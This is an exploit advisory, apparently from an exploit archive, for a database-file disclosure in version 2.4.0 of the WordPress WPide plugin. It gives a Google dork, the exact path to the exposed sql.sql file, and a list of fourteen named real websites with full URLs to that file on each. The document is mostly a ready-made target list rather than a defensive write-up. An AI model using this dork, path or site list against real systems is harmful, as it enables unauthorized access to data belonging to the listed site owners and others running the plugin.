WordPress WPide ACE-0.2.0 2.4.0 Database Disclosure

WordPress WPide ACE-0.2.0 plugin version 2.4.0 suffers from a database disclosure vulnerability.


MD5 | b042037147af9b7b0d48189c3c492457

#################################################################################################

# Exploit Title : WordPress WPide ACE-0.2.0 Plugin 2.4.0 Database Backup
Disclosure
# Author [ Discovered By ] : KingSkrupellos from Cyberizm Digital Security
Army
# Date : 08/12/2018
# Vendor Homepage : wordpress.org/plugins/wpide/ ~
pluginarchive.com/wordpress/wpide
# Software Download Link : downloads.wordpress.org/plugin/wpide.2.4.0.zip
# Tested On : Windows and Linux
# Category : WebApps
# Version Information : 2.4.0
# Exploit Risk : Medium
# Google Dorks : inurl:''/wp-content/plugins/wpide/''
# Vulnerability Type : CWE-264 - [ Permissions, Privileges, and Access
Controls ]
CWE-23 - [ Relative Path Traversal ] - CWE-200 [ Information Exposure ]
CWE-530 [ Exposure of Backup File to an Unauthorized Control Sphere ]

#################################################################################################

# Admin Panel Login Path :

/wp-login.php

# Exploit :

/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

#################################################################################################

# Example Vulnerable Sites =>

[+]
mnsuam.edu.pk/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
cloudsense.com/cswpblog/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
silverstitch.ca/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
alcoholandyouni.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
wallerpollins.com/aspt-event/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+] bluet.me/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
blog.donedeal.ie/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
cipriandumitrescu.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+] js.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+] tesolau.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
gastonbrowne.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
imedenver.com/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
videos.saltandlightcouncil.org/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

[+]
holografi.co/wp-content/plugins/wpide/ace-0.2.0/kitchen-sink/docs/sql.sql

#################################################################################################

# Discovered By KingSkrupellos from Cyberizm.Org Digital Security Team

#################################################################################################

Related Posts